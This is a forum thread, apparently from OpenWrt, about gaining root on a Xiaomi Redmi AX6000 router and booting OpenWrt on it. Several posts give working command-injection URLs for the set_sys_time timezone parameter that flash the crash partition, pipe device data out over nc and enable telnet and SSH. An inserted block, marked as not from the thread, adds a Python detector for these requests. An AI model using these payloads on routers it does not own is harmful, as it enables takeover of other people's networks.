Add OpenWrt support for Xiaomi "Redmi AX6000"

Not sure I understand. I double checked the encoding and tried with bdata set telnet_en=1 ; bdata set ssh_en=1 ; bdata commit (notice the =), telnet still won't accept my connection (port shows closed).

I also know that the vulnerability is working, http://192.168.31.1/cgi-bin/luci/;stok={token}/api/misystem/set_sys_time?timezone=%20%27%20%3b%20reboot%20%3b%20 reboots the device

1 Like

No luck yet, for reference I did bdata show | nc <computer ip> 1234

http://192.168.31.1/cgi-bin/luci/;stok={token}/api/misystem/set_sys_time?timezone=%20%27%20%3B%20bdata%20show%20%7C%20nc%20{computer ip}%201234%20%3B%20
rand_key=*redacted*
rand_nonce=*redacted*
SN=*redacted*
color=100
CountryCode=CN
model=RB06
ethaddr=*redacted*
ethaddr_wan=*redacted*
miot_did=*redacted*
miot_key=*redacted*
wl1_ssid=*redacted*
wl0_ssid=*redacted*
telnet_en=0
ssh_en=0
uart_en=0

shows they're still 0 after the 3rd reboot. Directly after the command to set bdata, telnet_en and ssh_en are set to 1, but they revert to 0 after reboot.

1 Like

It looks like encoding \xa5\x5a\x00\x00 is not working correctly.

dd if=/dev/mtd6 | hexdump -C | nc {computer ip} 1234

http://192.168.31.1/cgi-bin/luci/;stok={token}/api/misystem/set_sys_time?timezone=%20%27%20%3B%20dd%20if%3D%2Fdev%2Fmtd6%20%7C%20hexdump%20-C%20%7C%20nc%20{computer_ip}%201234%20%3B%20

I get this returned:

00000000  31 39 30 30 ff ff ff ff  ff ff ff ff ff ff ff ff  |1900............|
00000010  ff ff ff ff ff ff ff ff  ff ff ff ff ff ff ff ff  |................|
*
1 Like

This works:

1. Write \xa5\x5a\x00\x00 to the crash partition (magic bytes)

  • Create the magic bytes file (it's very difficult at best to encode raw bytes and send them over http):
    echo -n -e '\xa5\x5a\x00\x00' > magic_bytes.bin

  • On the PC, create an nc listener:
    nc -l 1234 < magic_bytes.bin

  • Copy the binary to the router: nc {computer_ip} {port} > /tmp/magic_bytes.bin
    http://192.168.31.1/cgi-bin/luci/;stok={token}/api/misystem/set_sys_time?timezone=%20%27%20%3b%20nc%20{computer_ip}%20{port}%20%3E%20%2Ftmp%2Fmagic_bytes.bin%20%3b%20

  • Write the binary to the crash partition (mtd6): cat /tmp/magic_bytes.bin | mtd write - crash
    http://192.168.31.1/cgi-bin/luci/;stok={token}/api/misystem/set_sys_time?timezone=%20%27%20%3b%20cat%20%2Ftmp%2Fmagic_bytes.bin%20%7C%20mtd%20write%20-%20crash%20%3b%20

  • Reboot: reboot
    http://192.168.31.1/cgi-bin/luci/;stok={token}/api/misystem/set_sys_time?timezone=%20%27%20%3b%20reboot%20%3b%20

2. Set bdata

  • Enable telnet, ssh and commit: bdata set telnet_en=1 ; bdata set ssh_en=1 ; bdata commit
    http://192.168.31.1/cgi-bin/luci/;stok={token}/api/misystem/set_sys_time?timezone=%20%27%20%3B%20bdata%20set%20telnet_en%3D1%20%3B%20bdata%20set%20ssh_en%3D1%20%3B%20bdata%20commit%20%3B%20

  • Reboot: reboot
    http://192.168.31.1/cgi-bin/luci/;stok={token}/api/misystem/set_sys_time?timezone=%20%27%20%3b%20reboot%20%3b%20

3. Reset the crash partition

  • Erase the crash partition: mtd erase crash
    http://192.168.31.1/cgi-bin/luci/;stok={token}/api/misystem/set_sys_time?timezone=%20%27%20%3b%20mtd%20erase%20crash%20%3b%20

Annnnnnd, telnet!

% telnet 192.168.31.1
Trying 192.168.31.1...
Connected to 192.168.31.1.
Escape character is '^]'.

XiaoQiang login: 

To get root password, follow same as AX3600: https://github.com/YangWang92/AX6S-unlock/raw/master/unlock_pwd.py

BusyBox v1.25.1 (2022-03-29 17:31:07 UTC) built-in shell (ash)

 -----------------------------------------------------
       Welcome to XiaoQiang!
 -----------------------------------------------------
  $$$$$$\  $$$$$$$\  $$$$$$$$\      $$\      $$\        $$$$$$\  $$\   $$\
 $$  __$$\ $$  __$$\ $$  _____|     $$ |     $$ |      $$  __$$\ $$ | $$  |
 $$ /  $$ |$$ |  $$ |$$ |           $$ |     $$ |      $$ /  $$ |$$ |$$  /
 $$$$$$$$ |$$$$$$$  |$$$$$\         $$ |     $$ |      $$ |  $$ |$$$$$  /
 $$  __$$ |$$  __$$< $$  __|        $$ |     $$ |      $$ |  $$ |$$  $$<
 $$ |  $$ |$$ |  $$ |$$ |           $$ |     $$ |      $$ |  $$ |$$ |\$$\
 $$ |  $$ |$$ |  $$ |$$$$$$$$\       $$$$$$$$$  |       $$$$$$  |$$ | \$$\
 \__|  \__|\__|  \__|\________|      \_________/        \______/ \__|  \__|


root@XiaoQiang:~# 
root@XiaoQiang:~# cat /etc/openwrt_release 
DISTRIB_ID='OpenWrt'
DISTRIB_RELEASE='18.06-SNAPSHOT'
DISTRIB_REVISION='unknown'
DISTRIB_TARGET='mediatek/mt7986'
DISTRIB_ARCH='aarch64_cortex-a53'
DISTRIB_DESCRIPTION='OpenWrt 18.06-SNAPSHOT unknown'
DISTRIB_TAINTS='no-all busybox'
root@XiaoQiang:~# id
uid=0(root) gid=0(root) groups=0(root)
root@XiaoQiang:~# uname -a
Linux XiaoQiang 5.4.150 #0 SMP Tue Mar 29 16:56:29 2022 aarch64 GNU/Linux
17 Likes
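The defender's counterpart to the requests in the steps above, as an added example that is not from the thread: a small scanner that URL-decodes access-log entries for the misystem/set_sys_time endpoint, flags any timezone value carrying shell metacharacters, and lists the commands that were chained behind the closing quote. The log format, client address and stok token are constructed for the demo.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Characters that close a quoted shell argument or chain commands; none of them
# belongs in a legitimate timezone value such as "Europe/Berlin".
SHELL_META = re.compile(r"['\";|&`$]")

# Constructed sample access-log lines: "<client> <method> <path?query> <status>".
# The stok value is a placeholder, not a real session token.
SAMPLE_LOG = """\
192.168.31.100 GET /cgi-bin/luci/;stok=abc123/api/misystem/set_sys_time?timezone=Europe%2FBerlin 200
192.168.31.100 GET /cgi-bin/luci/;stok=abc123/api/misystem/set_sys_time?timezone=%20%27%20%3b%20reboot%20%3b%20 200
192.168.31.100 GET /cgi-bin/luci/;stok=abc123/api/misystem/set_sys_time?timezone=%20%27%20%3B%20bdata%20set%20telnet_en%3D1%20%3B%20bdata%20commit%20%3B%20 200
192.168.31.100 GET /cgi-bin/luci/;stok=abc123/api/xqnetwork/get_netmode 200
"""


def timezone_param(path):
    """Return the percent-decoded `timezone` query value, or None if absent."""
    values = parse_qs(urlsplit(path).query, keep_blank_values=True).get("timezone")
    return values[0] if values else None


def injected_commands(tz):
    """Split an injected timezone value on ';' and drop the lone quote that
    closed the original argument, leaving only the chained commands."""
    parts = [p.strip() for p in tz.split(";")]
    return [p for p in parts if p and p not in ("'", '"')]


def scan_log(text):
    """Return (client, [commands]) for every set_sys_time request whose
    decoded timezone value contains shell metacharacters."""
    findings = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 3 or "/api/misystem/set_sys_time" not in fields[2]:
            continue
        tz = timezone_param(fields[2])
        if tz is not None and SHELL_META.search(tz):
            findings.append((fields[0], injected_commands(tz)))
    return findings


if __name__ == "__main__":
    for client, cmds in scan_log(SAMPLE_LOG):
        print(f"{client}: injected {cmds}")
```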

Great! Important discovery.

1 Like

I was able to make a build of OpenWrt for BananaPi-R3 that was added by @daniel last week, drop into AX6000 u-boot console, tftpboot initramfs-recovery and voila!

BusyBox v1.35.0 (2022-09-05 09:46:47 UTC) built-in shell (ash)

  _______                     ________        __
 |       |.-----.-----.-----.|  |  |  |.----.|  |_
 |   -   ||  _  |  -__|     ||  |  |  ||   _||   _|
 |_______||   __|_____|__|__||________||__|  |____|
          |__| W I R E L E S S   F R E E D O M
 -----------------------------------------------------
 OpenWrt SNAPSHOT, r0+20481-09ea1db93b
 -----------------------------------------------------
=== WARNING! =====================================
There is no root password defined on this device!
Use the "passwd" command to set up a new password
in order to prevent unauthorized SSH logins.
--------------------------------------------------
root@OpenWrt:/# uname -a
Linux OpenWrt 5.15.64 #0 SMP Tue Sep 6 10:15:48 2022 aarch64 GNU/Linux

OpenWrt running on a Redmi AX6000!

FWIW: on a uart console, spam ctrl-c immediately after power on and you'll drop into u-boot.

I need to get a good start on a dts now. I've already started here, but I'm about at the edge of my knowledge: https://github.com/soxrok2212/openwrt/blob/master/target/linux/mediatek/dts/mt7986a-xiaomi-redmi-router-ax6000.dts

As it stands, it builds but images made with it do not boot.

6 Likes

These will work, and there is no need to use nc (but I didn't write the original).

1. http://192.168.31.1/cgi-bin/luci/;stok={token}/api/misystem/set_sys_time?timezone=%20%27%20%3B%20zz%3D%24%28dd%20if%3D%2Fdev%2Fzero%20bs%3D1%20count%3D2%202%3E%2Fdev%2Fnull%29%20%3B%20printf%20%27%A5%5A%25c%25c%27%20%24zz%20%24zz%20%7C%20mtd%20write%20-%20crash%20%3B%20

reboot

2. http://192.168.31.1/cgi-bin/luci/;stok={token}/api/misystem/set_sys_time?timezone=%20%27%20%3B%20bdata%20set%20telnet_en%3D1%20%3B%20bdata%20set%20ssh_en%3D1%20%3B%20bdata%20commit%20%3B%20

reboot

3. http://192.168.31.1/cgi-bin/luci/;stok={token}/api/misystem/set_sys_time?timezone=%20%27%20%3b%20mtd%20erase%20crash%20%3b%20

reboot

I don't know why the nc prompt transmission completes and all the web pages return code 0, but I can't crack it.

2 Likes

@soxrok2212 and @PussAzuki, tell me, in what mode was your router when you exploited the vulnerability?
It is defined like this:

uci get xiaoqiang.common.NETMODE
uci get xiaoqiang.common.CAP_MODE
uci get xiaoqiang.common.MESH_VERSION

I'm also interested in this information:
http://192.168.31.1/cgi-bin/luci/;stok={token}/api/xqnetwork/get_netmode
netmode enum:
0 = ???
1 = "wifiapmode"
2 = "lanapmode"
3 = "whc_re"
4 = "whc_cap"
100 = recovery mode


After checking, I got this.

Hello! Can anyone see if there is OpenVPN in the stock firmware?

opkg list | grep openvpn 
root@XiaoQiang:/# opkg list | grep openvpn                                      
root@XiaoQiang:/# 

Negative, sir.

1 Like
root@XiaoQiang:/# uci get xiaoqiang.common.NETMODE
whc_cap
root@XiaoQiang:/# uci get xiaoqiang.common.CAP_MODE
uci: Entry not found
root@XiaoQiang:/# uci get xiaoqiang.common.MESH_VERSION
4

Thank you! It is a pity, of course, that OpenVPN is not installed. As I understand it, it's easy not to install it in the stock firmware.

It's based on 18.06.0, so you may be able to set up the appropriate opkg sources and install it that way. Otherwise, wait for a real OpenWrt image. I think (slightly over) the majority of the heavy lifting is done here.

I'm looking forward to the real OpenWrt image. I just read about the Xiaomi AX6000 (not Redmi) that there is no free space and no way to delete anything due to the read-only system partition. When my Redmi AX6000 arrives, I will definitely try to install OpenVPN. Thank you.

It does not allow installing OpenVPN; it says there is no free space. I will be waiting for the real OpenWrt image.

root@XiaoQiang:~# opkg install openvpn-openssl openvpn-easy-rsa
Installing openvpn-openssl (2.4.5-4.2) to root...
Installing openvpn-easy-rsa (3.0.4-1) to root...
Collected errors:
 * verify_pkg_installable: Only have 0kb available on filesystem /overlay, pkg openvpn-openssl needs 180
 * opkg_install_cmd: Cannot install package openvpn-openssl.
 * verify_pkg_installable: Only have 0kb available on filesystem /overlay, pkg openvpn-easy-rsa needs 17
 * opkg_install_cmd: Cannot install package openvpn-easy-rsa.

You have to mount the overlay first.
Here's a tutorial (not tested on AX6000 yet):
https://www.right.com.cn/forum/thread-4060726-1-1.html

In case you don't understand Chinese, here's a translation:

1. Create /etc/init.d/miwifi_overlay with the contents below (vi /etc/init.d/miwifi_overlay, i, paste, :wq)

#!/bin/sh /etc/rc.common

START=00

. /lib/functions/preinit.sh

start() {
        [ -e /data/overlay ] || mkdir /data/overlay
        [ -e /data/overlay/upper ] || mkdir /data/overlay/upper
        [ -e /data/overlay/work ] || mkdir /data/overlay/work

        mount --bind /data/overlay /overlay
        fopivot /overlay/upper /overlay/work /rom 1

        # Fix up miwifi misc, and DO NOT use /overlay/upper/etc instead: /etc/uci-defaults/* may already have been removed
        /bin/mount -o noatime,move /rom/data /data 2>&-
        /bin/mount -o noatime,move /rom/etc /etc 2>&-
        /bin/mount -o noatime,move /rom/ini /ini 2>&-
        /bin/mount -o noatime,move /rom/userdisk /userdisk 2>&-

        return 0
}

2. chmod 755 /etc/init.d/miwifi_overlay
3. /etc/init.d/miwifi_overlay enable
4. sync
5. reboot

After the reboot, you may be able to use opkg install. If you update the firmware, you should repeat the steps above.

2 Likes

This looks like a ton of progress. It's probably time to finally replace my tried-and-true WRT1900AC. I'm thinking of getting myself an AX6000 as it seems to be the best device available today, with a good perspective to run OpenWrt in the near future.

Unfortunately, I'm not a developer by any means, and my Linux knowledge is limited. But I'm used to running trunk builds (when created by others) and hopefully will be able to help with testing and validation.

1 Like

Can it change to US country code for higher tx power?

I got it starting to boot a dedicated build, however it appears to have issues with pcie. Likely a dts issue :confused:

[    0.860083] pstore: Using crash dump compression: deflate
[    0.869863] mtk-pcie-gen3 11280000.pcie: host bridge /soc/pcie@11280000 ranges:
[    0.877201] mtk-pcie-gen3 11280000.pcie: Parsing ranges property...
[    0.883457] mtk-pcie-gen3 11280000.pcie:      MEM 0x0020000000..0x002fffffff -> 0x0020000000
[    1.103091] mtk-pcie-gen3 11280000.pcie: PCIe link down, ltssm reg val: 0x1000001
[    1.110586] mtk-pcie-gen3: probe of 11280000.pcie failed with error -110
[    1.134928] Unable to handle kernel NULL pointer dereference at virtual address 00000000000000ac
[    1.143703] Mem abort info:
[    1.146483]   ESR = 0x96000005
[    1.149523]   EC = 0x25: DABT (current EL), IL = 32 bits
[    1.151516] mt7530 mdio-bus:00: configuring for fixed/2500base-x link mode
[    1.154816]   SET = 0, FnV = 0
[    1.154818]   EA = 0, S1PTW = 0
[    1.154819]   FSC = 0x05: level 1 translation fault
[    1.154822] Data abort info:
[    1.154823]   ISV = 0, ISS = 0x00000005
[    1.154825]   CM = 0, WnR = 0
[    1.154826] [00000000000000ac] user address but active_mm is swapper
[    1.154830] Internal error: Oops: 96000005 [#1] SMP
[    1.162116] mt7530 mdio-bus:00: Link is Up - 2.5Gbps/Full - flow control rx/tx
[    1.164719] Modules linked in:
[    1.164724] CPU: 0 PID: 286 Comm: irq/69-mt7530 Not tainted 5.15.64 #0
[    1.171458] mt7530 mdio-bus:00 wan (uninitialized): PHY [mt7530-0:01] driver [MediaTek MT7531 PHY] (irq=127)
[    1.172706] Hardware name: Xiaomi Redmi Router AX6000 (DT)
[    1.185499] mt7530 mdio-bus:00 lan1 (uninitialized): PHY [mt7530-0:02] driver [MediaTek MT7531 PHY] (irq=128)
[    1.188663] pstate: 800000c5 (Nzcv daIF -PAN -UAO -TCO -DIT -SSBS BTYPE=--)
[    1.203161] mt7530 mdio-bus:00 lan2 (uninitialized): PHY [mt7530-0:03] driver [MediaTek MT7531 PHY] (irq=129)
[    1.203752] pc : handle_nested_irq+0x34/0x1c0
[    1.219896] mt7530 mdio-bus:00 lan3 (uninitialized): PHY [mt7530-0:04] driver [MediaTek MT7531 PHY] (irq=130)
[    1.220053] lr : handle_nested_irq+0x14/0x1c0
[    1.226428] DSA: tree 0 setup
[    1.235401] sp : ffffffc00d89bd30
[    1.235403] x29: ffffffc00d89bd30 x28: ffffff80000542e0 x27: 0000000000000000
[    1.235409] x26: ffffff80000542ac x25: ffffffc008087454 x24: ffffff80051cf600
[    1.291251] x23: 00000000000000ac x22: ffffff80008ce540 x21: 0000000000000008
[    1.291488] Freeing unused kernel memory: 448K
[    1.298284] x20: 0000000000000000 x19: 0000000000000003 x18: 00000000bbc363b3
[    1.298290] x17: 0000000000000005 x16: 0000000000000001 x15: 0000000000000000
[    1.298295] x14: 0000000000000000 x13: ffffffc008827660 x12: 00000000fa83b2da
[    1.324048] x11: 0000000000000040 x10: ffffffc008b4a2a8 x9 : ffffffc008b4a2a0
[    1.331164] x8 : ffffff8000400270 x7 : 0000000000000000 x6 : 0000000000000000
[    1.338280] x5 : ffffff8000400248 x4 : ffffff8000400270 x3 : 0000000000000000
[    1.345395] x2 : 0000000000000001 x1 : 0000000000000000 x0 : 0000000000000000
[    1.352510] Call trace:
[    1.354942]  handle_nested_irq+0x34/0x1c0
[    1.358936]  mt7530_irq_thread_fn+0x98/0xa0
[    1.363106]  irq_thread_fn+0x28/0x8c
[    1.366666]  irq_thread+0x118/0x220
[    1.370138]  kthread+0x11c/0x130
[    1.373355]  ret_from_fork+0x10/0x20
[    1.376919] Code: d2800000 9102b297 52800022 f98002f1 (885ffee1) 
[    1.382992] ---[ end trace 2d60a5c2f4f20605 ]---
[    1.389212] Kernel panic - not syncing: Oops: Fatal exception
[    1.394937] SMP: stopping secondary CPUs
[    1.398844] Kernel Offset: disabled
[    1.402316] CPU features: 0x00000000,20000802
[    1.406656] Memory Limit: none
[    1.411322] Rebooting in 1 seconds..

It was an issue with my eth node. Got it booted without that. Need to correct it.

2 Likes